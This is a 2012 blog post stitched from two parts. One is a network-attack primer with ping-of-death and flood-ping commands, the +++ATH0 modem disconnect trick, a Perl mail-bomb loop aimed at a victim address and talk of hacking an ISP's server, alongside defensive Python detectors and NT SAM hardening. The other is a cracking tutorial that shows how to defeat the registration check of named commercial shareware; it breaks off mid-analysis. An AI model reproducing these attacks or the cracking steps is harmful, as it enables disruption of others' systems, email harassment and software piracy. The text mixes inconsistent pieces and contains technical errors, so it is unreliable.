Friday 31 August 2012

NETWORK SECURITY



NETWORK SECURITY
Most computer criminals and hackers succeed not because of their knowledge but because of the ignorance of users and system administrators in using their systems, servers and computer networks.
1. There are open ports on which hackers may attack.
2. There are dangerous kinds of attacks on servers and administrators.
3. There are mechanisms for securing Windows NT server administrator passwords.
This project is based on practical techniques and tactics of attacking, and on the concepts and mechanisms of these attacks.
Thus, to stop net criminals from intruding into systems, the system administrator should know the drawbacks and loopholes of the OS, the Internet and networking.
These papers give the details of different kinds of attacks that a hacker may launch against the administrator: concepts and techniques of attacks like DOS attacks, controlling and disconnecting remote modems, Trojan attacks, mail bombing, etc.
Emphasis is given to the open ports which hackers usually attack.

ATTACKS ON THE SERVER.

DOS ATTACKS
Denial of Service (DOS) attacks are now a very common hacking attack. A DOS attack is defined as: an attack on the target system by a malicious attacker to render the normal services offered by it unavailable to legitimate users, or to disable those services. It involves launching an attack that makes the services offered by the target system, or the normal services offered by the Internet or a network system, unavailable to a legitimate user.
A DOS attack can be described as one in which the target system's memory is so clogged that it cannot serve legitimate users, or in which the target system is sent so much data that it cannot handle it and crashes or reboots.

KINDS OF DOS ATTACK
PING OF DEATH: Ping is a part of ICMP, i.e. the Internet Control Message Protocol, which is used to troubleshoot TCP/IP networks.
Ping is a command that sends out a datagram to the specified host. If the specified host is alive, i.e. turned on, it sends back a reply, or echo, of the same datagram. If the datagram that returns to our computer is the same as the one that was sent, the host is alive. Ping is therefore basically a command that allows us to check whether a host is alive or not. It can also be used to determine the time taken for a datagram to reach the host.
It is considered deadly because it can be used to ping a host perpetually, which may cause the host to crash. When a host receives a ping, it allocates some of its resources to echoing back the datagram. If a host is pinged perpetually, a time will come when all the resources of the host are used up and the host either hangs or restarts.
Due to ping's deadly nature, most shell account ISPs hide the ping utility.
It can be found using the command:
whereis ping
It is usually hidden in /usr/etc.
The flood ping, which pings a host perpetually, is:
ping -t hostname
ping -a can be used to resolve the address of a hostname.
We can even ping ourselves. The IP 127.0.0.1 is the local host, which means that when we connect to 127.0.0.1 we actually connect to our own machine. Therefore, to ping ourselves perpetually, we give the command:
ping -t 127.0.0.1
However, the flood ping no longer works, as most operating systems have been updated.
The following ping command creates a giant datagram of size 65,510:
C:\windows>ping -l 65510
This might hang the victim's computer.
FPING UTILITY: This tool allows mass echo requests to be sent to a huge number of systems. The normal ping sends out echoes one by one to each system on a network. In contrast, fping sends mass echo requests to the entire network at a single time. Hence it is more efficient.
SYN FLOOD ATTACK: SYN flooding means flooding the target system with so many connection requests that all its memory gets hogged up in trying to establish proper connections with all these requests. In effect, since all the memory of the target system is used up in trying to establish connections, the target system is unable to provide services even to legitimate users. The SYN attack exploits the TCP/IP three-way handshake. Whenever a client wants to establish a connection with a host, three steps take place, known as the three-way handshake:
1. The client system sends a SYN packet to the remote host.
Client --------------- SYN packet ---------------> Host
2. The remote host replies with a SYN/ACK packet to the client.
Host --------------- SYN/ACK packet ---------------> Client
3. The client replies with an ACK packet, acknowledging the packet sent by the host in step 2.
Client --------------- ACK packet ---------------> Host
The above is known as the three-way handshake, and only when all three steps are completed is a complete TCP/IP connection established between source and destination.
In a SYN attack, several SYN packets are sent to the server, but all have a bad source IP address. When the server receives these SYN packets with bad IP addresses, it tries to respond to each one of them with a SYN/ACK. The target system then waits for an ACK message to come from the bad IP address. But as the IP doesn't exist, the target system never receives the message. Hence these requests occupy a large number of resources on the target system. As a result, due to the large number of requests, the memory of the system gets hogged up and it becomes unable to respond to legitimate users. The server eventually crashes, hangs or reboots.
In accordance with the rules of TCP/IP, after a certain time has passed a timeout takes place, the connection requests queued up by the target system are discarded, and a part of the hogged-up memory is freed. Therefore, in a SYN flood attack, the attacker keeps sending connection requests at a faster rate than the timeouts take place. Thus the attacker keeps the target system hung.
To find out whether we have been attacked, type the command:
C:\windows>netstat -a
This will show output such as:
Active Connections
Proto  Local Address  Foreign Address  State
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         201.xx.34.23     SYN_RECEIVED
TCP    aditya         *.*              ESTABLISHED
If the above command shows a lot of connections in the SYN_RECEIVED state, then the system is probably under SYN attack. The connections in the ESTABLISHED state are legitimate connections.
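The netstat check above can be automated. The following is an added example, not part of the original post: it counts half-open connections in saved `netstat -an` output and groups them by local port rather than by source, because the source addresses in a SYN flood are forged and therefore differ from row to row. The sample listing, the function names and the thresholds are assumptions chosen for illustration.

```python
from collections import Counter

# Windows netstat prints SYN_RECEIVED; Linux netstat prints SYN_RECV.
HALF_OPEN_STATES = {"SYN_RECEIVED", "SYN_RECV"}

# Constructed sample in Windows `netstat -an` layout (documentation addresses).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address      Foreign Address        State
  TCP    0.0.0.0:80         0.0.0.0:0              LISTENING
  TCP    192.0.2.10:80      203.0.113.5:1034       SYN_RECEIVED
  TCP    192.0.2.10:80      203.0.113.77:2211      SYN_RECEIVED
  TCP    192.0.2.10:80      198.51.100.9:4410      SYN_RECEIVED
  TCP    192.0.2.10:80      198.51.100.140:1999    SYN_RECEIVED
  TCP    192.0.2.10:80      203.0.113.201:3020     SYN_RECEIVED
  TCP    192.0.2.10:80      198.51.100.33:1500     SYN_RECEIVED
  TCP    192.0.2.10:80      192.0.2.44:1188        ESTABLISHED
  TCP    192.0.2.10:25      192.0.2.45:1302        ESTABLISHED
"""


def parse_netstat(text):
    """Return (local, foreign, state) for every TCP row in netstat output."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or not fields[0].lower().startswith("tcp"):
            continue
        if len(fields) >= 6 and fields[1].isdigit():
            # Linux layout: proto, Recv-Q, Send-Q, local, foreign, state
            local, foreign, state = fields[3], fields[4], fields[5]
        elif len(fields) >= 4:
            # Windows layout: proto, local, foreign, state
            local, foreign, state = fields[1], fields[2], fields[3]
        else:
            continue
        rows.append((local, foreign, state.upper()))
    return rows


def syn_flood_report(text, min_half_open=5, max_ratio=0.5):
    """Summarise half-open connections and flag a likely SYN flood.

    A host is flagged when it holds at least `min_half_open` half-open
    connections AND they make up more than `max_ratio` of all half-open plus
    established connections. Both thresholds are assumptions to tune per host.
    """
    rows = parse_netstat(text)
    half_open = [r for r in rows if r[2] in HALF_OPEN_STATES]
    established = sum(1 for r in rows if r[2] == "ESTABLISHED")
    # Group by the local port under attack: spoofed sources are all different.
    per_port = Counter(local.rsplit(":", 1)[-1] for local, _, _ in half_open)
    sources = {foreign.rsplit(":", 1)[0] for _, foreign, _ in half_open}
    total = len(half_open) + established
    ratio = len(half_open) / total if total else 0.0
    return {
        "half_open": len(half_open),
        "established": established,
        "per_local_port": dict(per_port),
        "distinct_sources": len(sources),
        "suspect": len(half_open) >= min_half_open and ratio > max_ratio,
    }


if __name__ == "__main__":
    for field, value in syn_flood_report(SAMPLE_NETSTAT).items():
        print(f"{field}: {value}")
```

Many distinct sources with few completed connections on one local port is the pattern to look for; a single busy client produces the opposite picture.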
CONTROLLING AND DISCONNECTING REMOTE MODEMS.
Let our IP address be xx.xx.xx.xx and let the server we are connecting to have the IP yy.yy.yy.yy. If we take a single data packet and send it to yy.yy.yy.yy, the packet will take the following path to reach the destination:
Data packet at source ---> Modem of source ---> Router ---> Modem of destination ---> Destination server
Thus each data packet goes via a modem, both at the source and at the destination. All data goes through modems, and this data may be a command.
A system controls a modem by issuing commands which are generally referred to as AT commands. The word AT precedes all modem commands, with a few exceptions.
An example of an AT command is the one issued when you dial into your ISP. When you click on the 'Connect' button, the DUN software sends the following command to your modem:
The ATDT or ATDP command, followed by the number you want to dial, and Enter.
To issue a command to the modem, it must be in command mode.
A modem is always either in command mode or in online mode. When the system boots up, the modem is, by default, in command mode. When the modem is in command mode, AT commands are treated as commands, while in online mode all commands are treated as data packets.
When we are connected to the Internet, the modem is in online mode and thus can't accept any command. This means that if we know the IP address of a person and send a modem command string, the modem will only treat it as normal data and will not react to it. Thus the modem has to be switched into command mode.
When the modem is in online mode, it can be brought into command mode by sending it the escape characters, i.e. +++. Sending the escape characters switches the modem to command mode, and it starts reacting to AT commands.
To return the modem to the online state, the ATO command is given.
Thus if we know the IP address of a person, and we send the +++ string to it followed by AT modem commands, we can practically control the remote modem. We can do anything with the modem.
H0 is the AT command that instructs the modem to hang up or disconnect.
If we want to disconnect our own modem, we issue the following command:
+++ATH0
This command switches the modem from online mode to command mode and then sends it the H0 command, which disconnects the modem.
If we send this command to a remote modem, it will disconnect that too.
NOTE: The command ATH0 doesn't work on all modems.
The way the ATH0 command works is that the escape/control sequence is hidden in an ICMP echo request packet (it contains the string +++ATH0). The string +++ sends the modem into escape mode, and if the guard time on the modem is set very low it goes into command mode instantaneously and accepts AT commands. The system receives the echo request packet and returns it to the sender with a new timestamp, checksum and destination/source hosts. When it is returned, the string is sent to the modem, and thus execution of the command takes place. There are a few conditions that must be met for it to work. These are:
1. The target computer must not filter ICMP echo requests, and must know how to reply to one if it gets one.
2. The target computer must be using a modem.
3. The target computer must have a vulnerable modem (i.e. the guard time must be set very low).
4. Spoofed (i.e. with a bad IP) packets must be sent to the target computer; otherwise the target computer will know where they are coming from.
TROJAN/KEY LOGGER ATTACKS
A Trojan is a tool which, when installed on a system, can be misused for malicious purposes by the attacker. Trojans are capable of doing a lot of harm to the target computer.
Almost all Trojans are made up of:
1. THE SERVER PART: This part of the Trojan has to be installed and running on the target system.
2. THE CLIENT PART: This part of the Trojan is installed and running on the attacker's computer.
Trojans attack in the following way:
1. The attacker tries to install the server part of the Trojan on the target system, by any of the following methods:
(a). Sending the Trojan disguised as a normal file through ICQ or any other instant messaging software.
(b). Installing the Trojan on the target computer manually.
(c). By trickery: In this method, the attacker hides the Trojan server part inside a normal .EXE file. This file is chosen by the attacker on the basis that the victim will find it useful and install the infected file.
2. Once the attacker has been able to install the Trojan on the target system, it binds to a particular port on the target computer and listens for connections. Each Trojan has a particular port to which it binds.
3. As soon as the Trojan is listening for connections, the attacker tries to find out the IP address of the target computer.
4. As soon as the attacker gets the IP address of the target system, he uses the client part of the Trojan on his own system and thus becomes able to control the target system. Using this Trojan, the attacker can enjoy full control of the target system.
DETECTION OF A TROJAN:
Almost all types of Trojans are loaded into memory each time Windows boots up. Some common locations where they are known to hide are:
(A). THE STARTUP FOLDER: c:\windows\start menu\programs\startup
The location of this folder is actually stored in the registry:
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shell folders]
Common Startup=c:\windows\start menu\programs\startup
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\user shell folders]
Startup=c:\windows\start menu\programs\startup
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\shell folders]
Startup=c:\windows\start menu\programs\startup
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\user shell folders]
Common Startup=c:\windows\start menu\programs\startup
(B). SYSTEM FILES: The two system files, win.ini and system.ini, are also executed.
(C). BATCH FILES: The two batch files, autoexec.bat and winstart.bat, are also executed. These batch files may contain malicious commands.
(D). THE WINDOWS REGISTRY: Trojan programs may also reside in the Windows registry. The entries under the following registry keys are executed when Windows boots:
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\RunServices]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Run]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\RunOnce]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\Run]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\RunOnce]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\RunServices]
Thus by monitoring these and other places, we can detect the presence of Trojans.
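One way to monitor the registry autostart keys listed in (D) is to compare a known-good registry export with a current one. The following is an added example, not part of the original post: it parses two regedit text exports and reports autostart values that are new or changed. Both exports, the value names and the file path in them are constructed for illustration.

```python
import re

HIVES = ("hkey_local_machine", "hkey_current_user")
PREFIX = "software\\microsoft\\windows\\currentversion\\"
# Autostart keys named in the article, lower-cased for comparison.
AUTOSTART_SUFFIXES = ("run", "runonce", "runservices", "runservicesonce")

# "name"="data" or @="data"; quoted names may contain escaped characters.
_VALUE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

# Constructed known-good export (regedit text format).
BASELINE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"""

# Constructed later export with one added program in two autostart keys.
CURRENT_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"msupdate"="C:\\WINDOWS\\SYSTEM\\msupd32.exe /quiet"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"msupdate"="C:\\WINDOWS\\SYSTEM\\msupd32.exe /quiet"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00
"""


def _unquote(token):
    """Strip quotes and undo regedit escaping; non-string data is kept as is."""
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        return re.sub(r"\\(.)", r"\1", token[1:-1])
    return token


def parse_reg_export(text):
    """Return {lower-cased key path: {value name: data}} for a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
        elif current is not None:
            match = _VALUE.match(line)
            if match:
                raw_name = match.group(1)
                name = "(Default)" if raw_name == "@" else _unquote(raw_name)
                current[name] = _unquote(match.group(2))
    return keys


def is_autostart_key(key):
    """True if the key is one of the Run* keys under HKLM or HKCU."""
    hive, _, rest = key.lower().partition("\\")
    return (hive in HIVES and rest.startswith(PREFIX)
            and rest[len(PREFIX):] in AUTOSTART_SUFFIXES)


def autostart_entries(text):
    """Return the set of (key, value name, command) in autostart keys."""
    found = set()
    for key, values in parse_reg_export(text).items():
        if is_autostart_key(key):
            for name, command in values.items():
                found.add((key, name, command))
    return found


def new_autostarts(baseline_text, current_text):
    """Entries present now that were absent from, or differ from, the baseline."""
    return sorted(autostart_entries(current_text) - autostart_entries(baseline_text))


if __name__ == "__main__":
    for key, name, command in new_autostarts(BASELINE_REG, CURRENT_REG):
        print(f"NEW  [{key}]  {name} = {command}")
```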

MAIL BOMBING
Mail bombing means sending a huge number of emails to a single email account so that the maximum space of the account is filled, the user can't receive any further email, and it becomes difficult for the user to read the existing emails.
Mail bombing is of two types:
1. THE MASS MAIL BOMBING METHOD: In this kind of attack the user's account is filled with a huge number of emails. There is mail bombing software which allows a particular message to be sent using an SMTP server. Such software can easily be made in Perl.
e.g. #!/bin/pearl
$mprogram=’/usr/lib/sendmail’;
$victim=’victim@hostname.com’;
$var=0;
while($var<1000)
{
open (MAIL,”|$mprogram$victim”)||die”can’t open mail program”;
printMAIL “Mail Bombing”;
close(MAIL);
sleep(4);
$var++;
}
This program will send 1000 emails to the target account.
2. LIST LINKING: In this kind of mail bombing the target is subscribed to thousands of mailing lists. This kind of mail bombing is more effective, as the user has to unsubscribe himself from this long list of mailing lists.
List linking mail bombing is done with mail bombing software. This software asks for the target email address, the address of the SMTP server, and the forged email address from which the mail bomb is to appear.
This software subscribes the victim again and again, and thus he has a lot of work to do. He may even miss his important incoming emails and existing emails.
In this type of attack, don't download all the messages and then delete them. Instead, log on to the POP port of your mail server and delete the useless messages using POP commands. By reading the headers, the mail bomber can easily be traced.

PORT SCANNING

There are basically two kinds of ports: physical (hardware) and virtual (software).
Hardware ports are the slots behind the CPU to which other system devices are connected. A software port is a virtual pipe through which information flows. A particular system can have a large number of ports. All ports are numbered, and on each port a particular service or software is running.
Port scanning is the first step in finding a hackable server, one with a hole or any vulnerability.
If we are to hack our ISP's server, we first have to find out the hostname of the server run by the ISP. Each server can have a large number of open ports, and it would take days to go through them manually and search for the services running on each port. This is where port scanning utilities come in.
Tools like SATAN make it possible to find out the list of open ports, the services running on them, and also the vulnerabilities of the target system.
Another thing we must be careful about when port scanning the ISP is that most port scanners are easily traceable. Being caught port scanning a host is a sure sign of hacker activity.
To find out the list of open ports on our own system, we give the command:
C:\windows>netstat -a
The ports are of three kinds:
1. THE WELL-KNOWN PORTS: These are the ports numbered from 0 to 1023. This range of ports is bound to the services running on them. Thus each port has a specific service running on it.
E.g. FTP runs on port 21.
2. THE REGISTERED PORT NUMBERS: These ports are from 1024 to 49151. This range of ports is not bound to any specific service. Networking utilities like browsers and email clients open a random port within this range and start communicating with the remote server. A port number within this range enables us to surf the net.
These ports are simply open so that our software applications can do the desired work. They act as a buffer, transferring received packets to the application and vice versa. Once we close our application, these ports are automatically closed.
3. THE DYNAMIC/PRIVATE PORT NUMBERS: These are the ports from 49152 to 65535. This range is rarely used and is mostly used by Trojans.
E.g. Sun starts its RPC ports at 32768.

BLOCKING THE PORTS:
This section shows what to do if the netstat command reports a couple of open ports on our system or server.
1. Check the Trojan list and compare whether the open port number matches any entry on it. If it does, get a Trojan remover and remove the Trojan.
2. We can also remap the ports. This is an efficient method of securing our open ports. Instead of running a service on a well-known port, where it can easily be exploited, it is better to run it on a not-so-well-known port. A hacker will then find it more difficult to find that service. This method is known as remapping.
3. ETHERPEEK is an excellent sniffing program which can easily trace a port scanner.
4. NUKE NABBER, a Windows freeware program, claims to be an excellent port blocker.
5. There are other utilities, such as PORT DUMPER, which can fake daemons (services) like Telnet, Finger, etc.
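Step 1 above, together with the three port ranges described earlier, can be scripted. The following is an added example, not part of the original post: it pulls the listening ports out of saved Windows `netstat -an` output, places each in its range, and marks ports that are expected, that match a Trojan default, or that are unexplained. The sample listing, the expected-port set and the three-entry Trojan port excerpt are assumptions; a real check would use a maintained list, and a port match is only a reason to investigate the owning process.

```python
import re

# Port ranges as given in the article.
RANGES = [
    (0, 1023, "well-known"),
    (1024, 49151, "registered"),
    (49152, 65535, "dynamic/private"),
]

# Illustrative excerpt of historically documented Trojan default ports
# (assumption: replace with a maintained list in practice).
TROJAN_PORTS = {12345: "NetBus", 27374: "SubSeven", 31337: "Back Orifice"}

# Windows `netstat -an` row: proto, local addr:port, foreign, optional state.
_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$", re.I)

# Constructed sample output (documentation addresses).
SAMPLE_LISTENERS = """
  Proto  Local Address      Foreign Address      State
  TCP    0.0.0.0:21         0.0.0.0:0            LISTENING
  TCP    0.0.0.0:80         0.0.0.0:0            LISTENING
  TCP    0.0.0.0:12345      0.0.0.0:0            LISTENING
  TCP    192.0.2.10:1042    198.51.100.7:80      ESTABLISHED
  TCP    0.0.0.0:49160      0.0.0.0:0            LISTENING
  UDP    0.0.0.0:31337      *:*
"""


def listening_ports(text):
    """Return sorted (proto, port) pairs that accept traffic.

    TCP rows count only in LISTENING state; UDP rows have no state column
    and are always counted.
    """
    ports = set()
    for line in text.splitlines():
        match = _ROW.match(line)
        if not match:
            continue
        proto = match.group(1).upper()
        state = (match.group(5) or "").upper()
        if proto == "UDP" or state == "LISTENING":
            ports.add((proto, int(match.group(3))))
    return sorted(ports)


def classify(port):
    """Name the range a port number falls in."""
    for low, high, name in RANGES:
        if low <= port <= high:
            return name
    raise ValueError(f"not a valid port number: {port}")


def review_ports(text, expected):
    """Return (proto, port, range, finding) for each listening port."""
    report = []
    for proto, port in listening_ports(text):
        if port in expected:
            finding = "expected"
        elif port in TROJAN_PORTS:
            finding = f"matches {TROJAN_PORTS[port]} default"
        else:
            finding = "unexplained"
        report.append((proto, port, classify(port), finding))
    return report


if __name__ == "__main__":
    for row in review_ports(SAMPLE_LISTENERS, expected={21, 80}):
        print("%-4s %-6d %-16s %s" % row)
```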

SECURING WINDOWS NT ADMINISTRATOR PASSWORDS
(Source : www.ntbugtraq.ntadvice.com/default.asp )
The NT Security Access Manager (SAM) is the security manager of the passwords of the Windows NT Administrator. The SAM stores the list of usernames of all accounts, and their respective passwords in encrypted form, for all local users on that particular domain. Cracking the encrypted passwords stored by the SAM is all that is needed to control the entire network.
By default, the backup of the SAM is stored in the file %systemroot%\repair\sam._, and by default this directory allows Everyone read access. Thus it is possible to retrieve the hashed (encrypted) passwords from the file directly. Therefore it is required not to give access to the root directory of the %systemroot% drive, so that no system file can be manipulated.
Recently the algorithm for reversing NT users' hashed passwords into the NT user IDs' passwords was published.
This created a scary concern over the relative security of the Windows NT Administrator system.
Therefore there are RECOMMENDATIONS for securing the file %systemroot%\repair\sam._ (this file stores the backup of the SAM, which stores the passwords, and is hence one of the most important files). These are:
TO SECURE THE %systemroot%\repair\sam._ FILE:
By default, the SAM._ file and the \repair directory have the following permissions:
Administrators; SYSTEM: Full Control
Everyone: Read
Power Users: Change
1. From within Explorer, highlight the SAM._ file, right click, and choose Properties, Security, Permissions. Remove all privileges from this file.
2. From the DOS prompt, execute the following:
cacls %systemroot%\repair\sam._ /D Everyone
This will deny the group Everyone permission to the file, ensuring that no other permission can override the file permission.
3. Whenever you need to update your ERD (Emergency Repair Disk), first execute the following at the DOS prompt:
cacls %systemroot%\repair\sam._ /T /G Administrators:C
This will grant Administrators change permission so that the file can be updated during the ERD update. (The SAM database is backed up whenever the ERD is updated.)
4. Once the ERD has been updated, execute the following at the DOS prompt:
cacls %systemroot%\repair\sam._ /E /R Administrators
This will once again remove the permission for Administrators.
Hence the file is fully secured.

All about Cracking


How to crack software
How to crack software – a beginner's tutorial!

Introduction:

I have read many cracking tutorials lately. Frankly speaking, I myself learned cracking from tutorials (and some book, but this doesn't really matter). The majority of the cracking tutorials out there have a few disadvantages: either they are too long and contain a lot of garbage, or they are too short, and don't contain the basics.

I decided to write a tutorial which will not have those two disadvantages.

Anyway, I divided the tutorial into 3 parts:

Part 1: Introduction, tools and The basics of cracking.

Part 2: Practical training, using W32Dasm, and HIEW

Part 3: Key-generators.

Welcome to the first part. ;-)

1. Disclaimer:

I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. What is Cracking?

For me, cracking is:
"Letting a program, which is on your computer, behave as you want it to behave and not behave as someone else (the programmer) wants"

As INTERN said: "Hey, it is your stuff right? your numbers, your bits, you should be able to do anything you wish to do with it "

Actually, I agree to this.

So cracking is modifying your programs, and making them work the way you want them to. U can get a free demo program, crack it, and use it. BUT!!!! I repeat, if you crack a program, and start selling the cracked version or even offering it for free, it is a crime!

After reading those three tutorials (this is the first one in this series), you will feel the power you have in your hands (I mean, in your head).

Well, let's get started?

3. Tools

There are very few tools you need by now... It is very easy to find them over the web, cause they are quite popular:

The first one is "Win32 Disassembler", which is also known as W32Dasm.

The Win32 Disassembler allows you to:

1. Disassemble files - translate the program to its assembly origin, or machine code.
The file types which can be disassembled in Win32 Disassembler:
exe, 386, com, cpl, drv, dll, fon, mpd, ocx, vbx, vbx and sys.
2. Load the program process and trace the program.
3. Browse the disassembled file and go to any code location that you want.
4. Find text.
5. Execute, insert or remove jumps and calls.
6. Import and export functions.
7. Show a HEX display of a code area.
8. Show the list of the STRINGS, DIALOGS and REFERENCES.
9. Save the disassembly source in text format.

Well, u can get it in almost any cracking site, but I'll give you some URLs:

1. http://wowsites.com/meiner/w32dsm89.zip

The second tool you need is Hiew, which is also known as Hacker's View. The Hacker's View tool allows you to:

1. Disassemble files.
2. Make changes in the disassembled file, such as: write commands, modify commands and reassemble the file.
3. View the file in ASCII, Hex or assembly mode.

You can also download an excellent program for cracking called Soft-ICe. Anyway, we won't need it in this part of the tutorial. Anyway, here are some URLs for Soft-ICe.

link - http://www.plunder.com/Softice-Insta...load-83770.htm

4. The Main steps of cracking


There are 7 steps in the process of cracking:

1. Run the program you want to crack and learn its standard behavior. Try to locate strings and keywords, try to enter the password and see how the program responds.
2. Open up the program with the W32Dasm and disassemble it.
3. Find typical and common strings in the disassembly that appeared in the program. In most cases, you have to look for keywords such as: password, name, date, expired, time limit, wrong, entered and so on.
4. Find and observe the password generator, find the learn protection routine and the API calls.
5. Try to understand the jumping mechanism of the protection.
6. Open up the program in HIEW. Change the jump of the flow control to its opposite jump command, or nop it out.
7. Run and see how the change you have made in the original program affected it. Feel the power you have, the power of cracking, letting programs behave as you want them to.

Learn those steps very well, until u dream of them, u will use them in every program you crack.

5. Basic terms in Assembly

A. Registers:

Registers are variables which are stored in your processor. The processor uses these variables for basic mathematical and logical operations. The most used registers are: eax, ebx, ecx and edx. Sometimes you will see edi, esi, esp, ebp. There are three types of registers: 32Bit registers, 16Bit registers and 8Bit registers. The 32Bit registers start with e, such as eax. There are 16Bit equivalents of these registers. The only difference between the two types is the variable size. These registers are: ax, bx, cx, dx, di, si, sp, bp. There are also 8Bit registers. The 8Bit registers are: al, ah, bl, bh, cl, ch, dl, dh. Here the l stands for the lower and the h for the higher 8 bits of a 16Bit register.

B. Flags:

Flags are Boolean variables (get 0 or 1 values). Flags are used by the processor for internal logical and mathematical operations, in order to get the result of the operation. The most important flag is the Zero Flag, which can get zero or non-zero (1) values.

C. Code Flow

When you are analyzing a piece of code, you must understand that the processor is actually quite stupid, and all it does is to simply follow the basic instructions, line by line. It does anything the code tells it to do, and cannot do anything that is not written in the code (unless it has been run over by a herd of cows and abducted by aliens). This is why you have to think like the processor when you're analyzing a piece of code, and to act like it (just don't get used to it! Inhale, exhale, inhale, exhale... nevermind, stupid joke). You have to do everything the processor does, you have to compare registers and variables, execute jumps and calls, calculate basic mathematical operations, store and load register values and addresses, and so on... The processor has an instruction pointer especially for this, which is also called IP (it has nothing to do with IP addresses in the Internet Protocol, trust me). Using the instruction pointer, the processor points to the instruction that is about to be executed. The processor also has and executes instructions which change the code flow.
These instructions can be function calls, any other routine calls, jumps, conditional jumps, which depend on the zero flag, negative conditional jumps...

6. Conclusion

In this part of the tutorial we have learnt the meaning of the word cracking: making programs behave as you want them to, and not the way the programmer wants them to. We have also learnt about the basic and the popular tools of cracking: W32Dasm, Hiew and SoftICE. And finally we have learnt the 7 main steps of cracking.
Now, before you go to the next chapter, you have to learn these 7 steps and download the tools mentioned above, because we can't go on to the next chapter unless you have those tools and know the steps.

Part 2

0. Introduction:

In this part, the second part of the cracking tutorial, you will learn to use the most important tools of the common cracker: W32Dasm and HIEW. You will also learn to crack some simple programs.
The tutorials are divided into 3 parts:

Part 1:Introduction, tools and the basics of cracking.
Part 2: Practical training, using W32Dasm, and HIEW.
Part 3: key-generators

1. Disclaimer:


I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. The main steps of cracking

You have already seen these steps in the previous part of the tutorial, but it's very important to know them. Remembering these steps and following them is 40% of the way towards success in cracking the program!!!

There are 7 steps in the cracking process:

1. Run the program you want to crack and study its behavior. Try to locate strings and keywords, try to enter the password and see how the program responds.
2. Open the program with the W32Dasm and disassemble it.
3. Find typical and common strings in the disassembly that appeared within the program. In most cases, you have to look for keywords such as: password, name, date, expired, time limit, wrong, entered and so on.
4. Find and observe the password generator, find the learn protection routine and the API calls.
5. Try to understand the jumping mechanism of the protection.
6. Open the program in Hiew. Change the jump of the flow control to its opposite jump command, or NOP it out.
7. Run and check how the change you have made in the original program affected it. Feel the power you have, the power of cracking, making programs behave the way you want them to.

Learn those steps very well, until u dream of them, u will use them in every program you crack.

3. Additional programs you need to have for this part of the tutorial

By now, in this part of the tutorial, you have learnt the main steps of cracking. Now, you are going to crack your first program.

But before that, you need to get a little program called "Sweet Little Piano". You can download it from: http://www.ronimusic.com/

Now, when you have the program, let's start!

4. Cracking the first program (Sweet little Piano)

Now we will follow each step and crack the program:

Step 1: Running the program:

Well, Run it! Duh... :-)

Well, what do we see here..... The program opens two text files. Also we see "Unregistered Shareware" on the caption bar...
Now let's open the Help menu for any registration options... Humm, what do we see here now...
oh, it's a password option... Well, select it and enter something (don't hope it will be right :-)). To see what happens... Click
OK.. Hmm, nothing happens.... Maybe it accepted it? Hmm.. no way... the caption bar still says Unregistered... Ok close it...
bah ... more text files ... and a notification that the settings are not saved in the unregistered version ... well ... kind of
irritating those text files! Let's fix it :-)

Step 2: Disassemble the program:

Disassemble the program. Good, small is fast :-) Always.... Now, we don't have any strings that pop up when we want to
register something... Let's browse for strings like registered, unregistered, the string about the unsaved settings. Hmm...
evaluation time left ... password.txt.... passworddialog.... sweet little piano - Unregistered <<-- looks like our caption bar ;-)
go on...Thanks for registering ... cool! So it thanks you anyway :-) Let's jump to that place ... Double click on it and we will pop
right on top of the registration routine...

Step 3: Analyzing the protection routine.... / Understanding the jumping Mechanism...

Let's analyze the protection routine.


PasswordDialog ... a call to GetDlgItemTextA ... another call.... a test... and depending on the test a je.... The je jumps over the thank you ... And just ends the dialog box ... without telling you that you entered something wrong... So this is right ... we did indeed not see that we typed something wrong ... but apparently we are supposed to see if we type something right

Again execute the je jump, and look where it goes to ... return from the jump.... Now lets try to rewrite what goes on here...

call ShowPasswordDialog
call GetEnteredText
